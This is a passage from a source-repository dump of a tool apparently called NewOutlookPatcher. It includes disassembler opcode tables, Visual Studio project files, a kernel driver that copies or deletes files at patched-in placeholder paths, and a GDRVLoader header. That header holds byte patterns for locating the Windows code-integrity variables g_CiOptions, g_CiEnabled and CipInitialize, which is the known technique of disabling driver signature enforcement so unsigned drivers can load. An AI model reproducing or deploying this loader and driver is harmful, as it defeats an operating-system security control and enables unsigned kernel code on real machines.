40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 
0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 
0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | 76 | -------------------------------------------------------------------------------- /NOP.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio Version 17 3 | VisualStudioVersion = 17.7.34031.279 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "worker", "NOP\worker\worker.vcxproj", "{8480DA70-45E9-4D91-A89C-24B27D0F4924}" 6 | EndProject 7 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "gui", "NOP\gui\gui.csproj", "{E109B8FE-CAD8-466A-9502-9AD85ED78B45}" 8 | ProjectSection(ProjectDependencies) = postProject 9 | {8480DA70-45E9-4D91-A89C-24B27D0F4924} = {8480DA70-45E9-4D91-A89C-24B27D0F4924} 10 | EndProjectSection 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|Any CPU = Debug|Any CPU 15 | Debug|ARM64 = Debug|ARM64 16 | Debug|x64 = Debug|x64 17 | Debug|x86 = Debug|x86 18 | Release|Any CPU = Release|Any CPU 19 | Release|ARM64 = Release|ARM64 20 | Release|x64 = Release|x64 21 | Release|x86 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 24 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|Any CPU.ActiveCfg = Debug|x64 25 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|Any CPU.Build.0 = Debug|x64 26 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|ARM64.ActiveCfg = Debug|x64 27 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|ARM64.Build.0 = Debug|x64 28 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x64.ActiveCfg = Debug|x64 29 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x64.Build.0 = Debug|x64 30 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x86.ActiveCfg = Debug|Win32 31 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Debug|x86.Build.0 = Debug|Win32 32 | 
{8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|Any CPU.ActiveCfg = Release|x64 33 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|Any CPU.Build.0 = Release|x64 34 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|ARM64.ActiveCfg = Release|x64 35 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|ARM64.Build.0 = Release|x64 36 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x64.ActiveCfg = Release|x64 37 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x64.Build.0 = Release|x64 38 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x86.ActiveCfg = Release|Win32 39 | {8480DA70-45E9-4D91-A89C-24B27D0F4924}.Release|x86.Build.0 = Release|Win32 40 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 41 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|Any CPU.Build.0 = Debug|Any CPU 42 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|ARM64.ActiveCfg = Debug|Any CPU 43 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|ARM64.Build.0 = Debug|Any CPU 44 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x64.ActiveCfg = Debug|Any CPU 45 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x64.Build.0 = Debug|Any CPU 46 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x86.ActiveCfg = Debug|Any CPU 47 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Debug|x86.Build.0 = Debug|Any CPU 48 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|Any CPU.ActiveCfg = Release|Any CPU 49 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|Any CPU.Build.0 = Release|Any CPU 50 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|ARM64.ActiveCfg = Release|Any CPU 51 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|ARM64.Build.0 = Release|Any CPU 52 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x64.ActiveCfg = Debug|Any CPU 53 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x64.Build.0 = Debug|Any CPU 54 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x86.ActiveCfg = Release|Any CPU 55 | {E109B8FE-CAD8-466A-9502-9AD85ED78B45}.Release|x86.Build.0 = Release|Any CPU 56 | EndGlobalSection 57 | 
GlobalSection(SolutionProperties) = preSolution 58 | HideSolutionNode = FALSE 59 | EndGlobalSection 60 | GlobalSection(ExtensibilityGlobals) = postSolution 61 | SolutionGuid = {6CF0B89F-CA44-455A-9863-248A94FC4698} 62 | EndGlobalSection 63 | EndGlobal 64 | -------------------------------------------------------------------------------- /hde/table64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #define C_NONE 0x00 9 | #define C_MODRM 0x01 10 | #define C_IMM8 0x02 11 | #define C_IMM16 0x04 12 | #define C_IMM_P66 0x10 13 | #define C_REL8 0x20 14 | #define C_REL32 0x40 15 | #define C_GROUP 0x80 16 | #define C_ERROR 0xff 17 | 18 | #define PRE_ANY 0x00 19 | #define PRE_NONE 0x01 20 | #define PRE_F2 0x02 21 | #define PRE_F3 0x04 22 | #define PRE_66 0x08 23 | #define PRE_67 0x10 24 | #define PRE_LOCK 0x20 25 | #define PRE_SEG 0x40 26 | #define PRE_ALL 0xff 27 | 28 | #define DELTA_OPCODES 0x4a 29 | #define DELTA_FPU_REG 0xfd 30 | #define DELTA_FPU_MODRM 0x104 31 | #define DELTA_PREFIXES 0x13c 32 | #define DELTA_OP_LOCK_OK 0x1ae 33 | #define DELTA_OP2_LOCK_OK 0x1c6 34 | #define DELTA_OP_ONLY_MEM 0x1d8 35 | #define DELTA_OP2_ONLY_MEM 0x1e7 36 | 37 | unsigned char hde64_table[] = { 38 | 0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5, 39 | 0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1, 40 | 0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea, 41 | 0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0, 42 | 0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab, 43 | 0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92, 44 | 0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90, 45 | 
0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b, 46 | 0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b, 47 | 0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc, 48 | 0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20, 49 | 0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff, 50 | 0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00, 51 | 0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01, 52 | 0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10, 53 | 0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00, 54 | 0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00, 55 | 0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00, 56 | 0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00, 57 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 58 | 0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00, 59 | 0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40, 60 | 0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43, 61 | 0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40, 62 | 0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40, 63 | 0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06, 64 | 0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07, 65 | 0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04, 66 | 0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10, 67 | 0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00, 68 | 0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb, 69 | 
0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff, 70 | 0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09, 71 | 0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff, 72 | 0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08, 73 | 0x00,0xf0,0x02,0x00 74 | }; 75 | -------------------------------------------------------------------------------- /NOP/installer/Driver.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | volatile int i = 0; 4 | #define PATH_SRC L"\\DosDevices\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 5 | #define PATH_DST L"\\DosDevices\\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" 6 | #define BUFSIZ 1024 7 | #define BUFTAG 'ilav' 8 | // echo load | GDRVLoader.exe DrvCopyFile.sys & echo unload | GDRVLoader.exe DrvCopyFile.sys 9 | 10 | NTSTATUS DriverUnload(_In_ PDRIVER_OBJECT driverObject) { 11 | UNREFERENCED_PARAMETER(driverObject); 12 | 13 | DbgPrint(("NewOutlookPatcher: DriverUnload\n")); 14 | return STATUS_SUCCESS; 15 | } 16 | 17 | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT driverObject, _In_ PUNICODE_STRING registryPath) { 18 | UNREFERENCED_PARAMETER(registryPath); 19 | 20 | DbgPrint(("NewOutlookPatcher: DriverEntry\n")); 21 | driverObject->DriverUnload = DriverUnload; 22 | 23 | NTSTATUS rv = STATUS_SUCCESS; 24 | 25 | UNICODE_STRING szSrcName; 26 | RtlInitUnicodeString(&szSrcName, PATH_SRC); 27 | 
OBJECT_ATTRIBUTES oaSrcName; 28 | InitializeObjectAttributes(&oaSrcName, &szSrcName, OBJ_CASE_INSENSITIVE, NULL, NULL); 29 | UNICODE_STRING szDstName; 30 | RtlInitUnicodeString(&szDstName, PATH_DST); 31 | OBJECT_ATTRIBUTES oaDstName; 32 | InitializeObjectAttributes(&oaDstName, &szDstName, OBJ_CASE_INSENSITIVE, NULL, NULL); 33 | 34 | if (PATH_SRC[12 + i] == L'Z' && PATH_SRC[13 + i] == L'w' && PATH_SRC[14 + i] == L'D' && PATH_SRC[15 + i] == L'e' && PATH_SRC[16 + i] == L'l' && PATH_SRC[17 + i] == L'e' && PATH_SRC[18 + i] == L't' && PATH_SRC[19 + i] == L'e' && PATH_SRC[20 + i] == L'F' && PATH_SRC[21 + i] == L'i' && PATH_SRC[22 + i] == L'l' && PATH_SRC[23 + i] == L'e' && PATH_SRC[24 + i] == L'\0') { 35 | 36 | rv = ZwDeleteFile(&oaDstName); 37 | DbgPrint("NewOutlookPatcher: ZwDeleteFile Src: %S (%d)\n", PATH_DST, rv); 38 | } 39 | else { 40 | 41 | HANDLE hSrc; 42 | IO_STATUS_BLOCK iosbSrcCreate; 43 | rv = ZwCreateFile(&hSrc, GENERIC_READ, &oaSrcName, &iosbSrcCreate, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 44 | DbgPrint("NewOutlookPatcher: ZwCreateFile Src: %S (%d)\n", PATH_SRC, rv); 45 | if (NT_SUCCESS(rv)) { 46 | 47 | HANDLE hDst; 48 | IO_STATUS_BLOCK iosbDstCreate; 49 | rv = ZwCreateFile(&hDst, GENERIC_WRITE, &oaDstName, &iosbDstCreate, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 50 | DbgPrint("NewOutlookPatcher: ZwCreateFile Dst: %S (%d)\n", PATH_DST, rv); 51 | if (NT_SUCCESS(rv)) { 52 | 53 | PVOID buffer = ExAllocatePool2(POOL_FLAG_PAGED, BUFSIZ, BUFTAG); 54 | DbgPrint("NewOutlookPatcher: ExAllocatePool2: %p\n", buffer); 55 | if (buffer) { 56 | 57 | LARGE_INTEGER liReadPos, liWritePos; 58 | liReadPos.QuadPart = 0; 59 | liWritePos.QuadPart = 0; 60 | 61 | while (NT_SUCCESS(rv)) { 62 | IO_STATUS_BLOCK iosbSrcRead; 63 | rv = ZwReadFile(hSrc, NULL, NULL, NULL, &iosbSrcRead, buffer, BUFSIZ, &liReadPos, NULL); 64 | //DbgPrint(("ZwReadFile Src: %x\n", rv)); 65 | if (NT_SUCCESS(rv)) { 
66 | 67 | liReadPos.QuadPart += iosbSrcRead.Information; 68 | IO_STATUS_BLOCK iosbSrcWrite; 69 | rv = ZwWriteFile(hDst, NULL, NULL, NULL, &iosbSrcWrite, buffer, (ULONG)iosbSrcRead.Information, &liWritePos, NULL); 70 | //DbgPrint(("ZwWriteFile Dst: %x\n", rv)); 71 | if (NT_SUCCESS(rv)) { 72 | 73 | liWritePos.QuadPart += iosbSrcWrite.Information; 74 | } 75 | } 76 | } 77 | 78 | ExFreePoolWithTag(buffer, BUFTAG); 79 | } 80 | 81 | ZwClose(hDst); 82 | } 83 | ZwClose(hSrc); 84 | } 85 | } 86 | 87 | return STATUS_SUCCESS; 88 | } 89 | -------------------------------------------------------------------------------- /GDRVLoader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Release 6 | x64 7 | 8 | 9 | 10 | 16.0 11 | {C2F662DB-3ED6-47EE-A331-2EBE11AA36C3} 12 | Win32Proj 13 | Swind2 14 | 10.0 15 | loader 16 | 17 | 18 | 19 | Application 20 | false 21 | true 22 | Unicode 23 | v143 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | false 36 | $(SolutionDir)$(Platform)\Release\ 37 | $(Platform)\$(ConfigurationName)\ 38 | true 39 | 40 | 41 | true 42 | $(TargetName.Replace(' ','')) 43 | 44 | 45 | 46 | Level3 47 | NotUsing 48 | MaxSpeed 49 | true 50 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 51 | ProgramDatabase 52 | Column 53 | 54 | 55 | MultiThreaded 56 | 57 | 58 | stdcpp20 59 | 60 | 61 | true 62 | 63 | 64 | Sync 65 | Default 66 | true 67 | Neither 68 | 69 | 70 | 71 | 72 | true 73 | true 74 | 75 | 76 | Windows 77 | true 78 | true 79 | true 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | /NOVCFEATURE /NOCOFFGRPINFO %(AdditionalOptions) 89 | ntdll.lib;kernel32.lib;shlwapi.lib 90 | 91 | 92 | false 93 | false 94 | RequireAdministrator 95 | 96 | 97 | true 98 | 99 | 100 | true 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- 
/NOP/installer/installer.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | Debug 14 | ARM64 15 | 16 | 17 | Release 18 | ARM64 19 | 20 | 21 | 22 | {592D31AB-A734-4DEE-B85F-57BB67759963} 23 | {1bc93793-694f-48fe-9372-81e2b05556fd} 24 | v4.5 25 | 12.0 26 | Debug 27 | x64 28 | installer 29 | 30 | 31 | 32 | Windows10 33 | true 34 | WindowsKernelModeDriver10.0 35 | Driver 36 | KMDF 37 | Universal 38 | 39 | 40 | Windows10 41 | false 42 | WindowsKernelModeDriver10.0 43 | Driver 44 | KMDF 45 | Universal 46 | 47 | 48 | Windows10 49 | true 50 | WindowsKernelModeDriver10.0 51 | Driver 52 | KMDF 53 | Universal 54 | 55 | 56 | Windows10 57 | false 58 | WindowsKernelModeDriver10.0 59 | Driver 60 | KMDF 61 | Universal 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | DbgengKernelDebugger 73 | true 74 | 75 | 76 | DbgengKernelDebugger 77 | true 78 | 79 | 80 | DbgengKernelDebugger 81 | 82 | 83 | DbgengKernelDebugger 84 | 85 | 86 | 87 | sha256 88 | 89 | 90 | 91 | 92 | sha256 93 | 94 | 95 | 96 | 97 | sha256 98 | 99 | 100 | 101 | 102 | sha256 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | -------------------------------------------------------------------------------- /global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | #include "utils/ntdll.h" 5 | #include 6 | #include 7 | 8 | const BYTE Pattern_CipInit_1709[17] = "\x4c\x8b\xcb\x4c\x8b\xc7\x48\x8b\xd6\x8b\xcd\xe8\x00\x00\x00\x00"; 9 | const BYTE Pattern_CipInit[13] = "\x41\x8b\xca\x48\x83\xc4\x28\xe9\x00\x00\x00\x00"; 10 | const BYTE Pattern_gCiOptions[10] = "\x49\x8b\xe9\x89\x0d\x00\x00\x00\x00"; 11 | const BYTE Pattern_gCiEnabled[5] = "\xeb\x06\x88\x1d"; 12 | 13 | 14 | #ifdef __cplusplus 15 | extern "C" { 16 | #endif 17 | 18 | #define PAGE_SIZE 0x1000 19 | 20 | #if defined(__cplusplus) && \ 21 | 
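((defined(_MSC_VER) && (_MSC_VER >= 1900)) || defined(__clang__))
#define CONSTEXPR constexpr
#else
#define CONSTEXPR
#endif

// clang: redefine the offset macros on top of the compiler builtin.
#if defined(__clang__)
#undef FIELD_OFFSET
#undef UFIELD_OFFSET
#define FIELD_OFFSET(type, field) ((LONG)__builtin_offsetof(type, field))
#define UFIELD_OFFSET(type, field) ((ULONG)__builtin_offsetof(type, field))
#endif

// swind2.cpp
NTSTATUS
WindLoadDriver(
	_In_ PWCHAR LoaderName,
	_In_ PWCHAR DriverName,
	_In_ BOOLEAN Hidden
	);

NTSTATUS
WindUnloadDriver(
	_In_ PWCHAR DriverName,
	_In_ BOOLEAN Hidden
	);

// sysinfo.cpp
NTSTATUS
PrintSystemInformation(
	);

// pe.cpp
NTSTATUS
MapFileSectionView(
	_In_ PCWCHAR Filename,
	_In_ BOOLEAN ForceDisableAslr,
	_Out_ PVOID *ImageBase,
	_Out_ PSIZE_T ViewSize
	);

PVOID
GetProcedureAddress(
	_In_ ULONG_PTR DllBase,
	_In_ PCSTR RoutineName
	);

// Returns the OS major version, read directly from the user-mode mapping of
// KUSER_SHARED_DATA (0x7FFE0000); 0x026C is the NtMajorVersion field.
FORCEINLINE
ULONG
RtlNtMajorVersion(
	)
{
	return *reinterpret_cast<PULONG>(0x7FFE0000 + 0x026C);
}

// Returns the OS minor version from the same mapping; 0x0270 is NtMinorVersion.
FORCEINLINE
ULONG
RtlNtMinorVersion(
	)
{
	return *reinterpret_cast<PULONG>(0x7FFE0000 + 0x0270);
}

// Converts milliseconds to 100-nanosecond ticks (10000 ticks per millisecond).
// The operand is widened first so the product is computed in 64 bits.
CONSTEXPR
FORCEINLINE
LONGLONG
RtlMsToTicks(
	_In_ ULONG Milliseconds
	)
{
	return 10000LL * static_cast<LONGLONG>(Milliseconds);
}

// Sleeps for the given number of milliseconds. The tick count is negated
// because NtDelayExecution treats a negative value as a relative interval.
FORCEINLINE
VOID
RtlSleep(
	_In_ ULONG Milliseconds
	)
{
	LARGE_INTEGER Timeout;
	Timeout.QuadPart = -1 * RtlMsToTicks(Milliseconds);
	NtDelayExecution(FALSE, &Timeout);
}

// Compile-time check: TRUE when built for a 64-bit target.
CONSTEXPR
FORCEINLINE
BOOLEAN
IsWin64(
	)
{
#if defined(_WIN64) || defined(_M_AMD64)
	return TRUE;
#else
	return FALSE;
#endif
}

// Blocks until a key-down event arrives with neither Ctrl key held.
// Returns early when the console read fails: that happens when standard input
// is not a console (redirected or piped input), and without the check the
// loop would spin forever on the unchanged record.
inline
VOID
WaitForKey(
	)
{
	HANDLE StdIn = NtCurrentPeb()->ProcessParameters->StandardInput;
	INPUT_RECORD InputRecord = { 0 };
	ULONG NumRead;
	for (;;)
	{
		if (!ReadConsoleInputW(StdIn, &InputRecord, 1, &NumRead))
			break;

		const BOOLEAN IsKeyDown = InputRecord.EventType == KEY_EVENT &&
			InputRecord.Event.KeyEvent.bKeyDown;
		const BOOLEAN CtrlHeld = (InputRecord.Event.KeyEvent.dwControlKeyState &
			(RIGHT_CTRL_PRESSED | LEFT_CTRL_PRESSED)) != 0;
		if (IsKeyDown && !CtrlHeld)
			break;
	}
}

#ifdef NT_ANALYSIS_ASSUME
// wdm.h's asserts are incompatible with both clang and MS's own analyzer
#undef NT_ANALYSIS_ASSUME
#undef NT_ASSERT_ACTION
#undef NT_ASSERTMSG_ACTION
#undef NT_ASSERTMSGW_ACTION
#undef NT_ASSERT_ASSUME
#undef NT_ASSERTMSG_ASSUME
#undef NT_ASSERTMSGW_ASSUME
#undef NT_ASSERT
#undef NT_ASSERTMSG
#undef NT_ASSERTMSGW
#endif

#ifdef _PREFAST_
#define NT_ANALYSIS_ASSUME(...) _Analysis_assume_(__VA_ARGS__)
#elif defined(_DEBUG) || defined(DBG)
#define NT_ANALYSIS_ASSUME(...) ((void) 0)
#else
#define NT_ANALYSIS_ASSUME(...) __noop(__VA_ARGS__)
#endif

#if !defined(__clang__)
#if !defined(DbgRaiseAssertionFailure)
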